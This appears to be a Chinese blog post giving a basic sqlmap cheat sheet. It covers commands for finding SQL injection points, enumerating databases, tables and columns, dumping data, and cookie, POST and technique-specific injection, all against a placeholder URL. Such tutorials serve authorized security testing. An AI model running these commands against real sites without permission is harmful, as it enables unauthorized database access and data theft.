sqlmap的基本使用
sqlmap的基本使用
一、注入
1、查询是否存在注入点
sqlmap -u "http://www.xx.com?id=x"
--dbs 检测有哪些数据库
--current-db 检测当前数据库
--tables -D "db_name" 获取db_name数据库中的表名
--columns -T "table_name" -D "db_name" 获取db_name数据库table_name表中的字段名
--dump -C "columns_name" -T "table_name" -D "db_name" 获取数据
2、cookie注入
sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2
3、POST注入
用文本指定测试参数
sqlmap -r xxx.txt -p username (-p 指定测试的参数)
自动搜索表单
sqlmap -u "http://www.xx.com?id=x" --forms
url指定测试参数
sqlmap -u "http://www.xx.com?id=x" --data "username=1&password=1"
4、指定注入方式
指定联合注入
sqlmap -u "http://www.xx.com?id=x" --technique U
指定联合加布尔注入
sqlmap -u "http://www.xx.com?id=x" --technique UB
指定其他注入
U:联合注入
E:报错注入
B:布尔注入
T:延时注入
S:堆叠注入
5、自动选择默认提示
sqlmap -u "http://www.xx.com?id=x" --batch
6、指定线程数,最大线程数是10
sqlmap -u "http://www.xx.com?id=x" --thread 5
7、设置代理
sqlmap -u "http://www.xx.com?id=x" --proxy="http://127.0.0.1:8080"
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】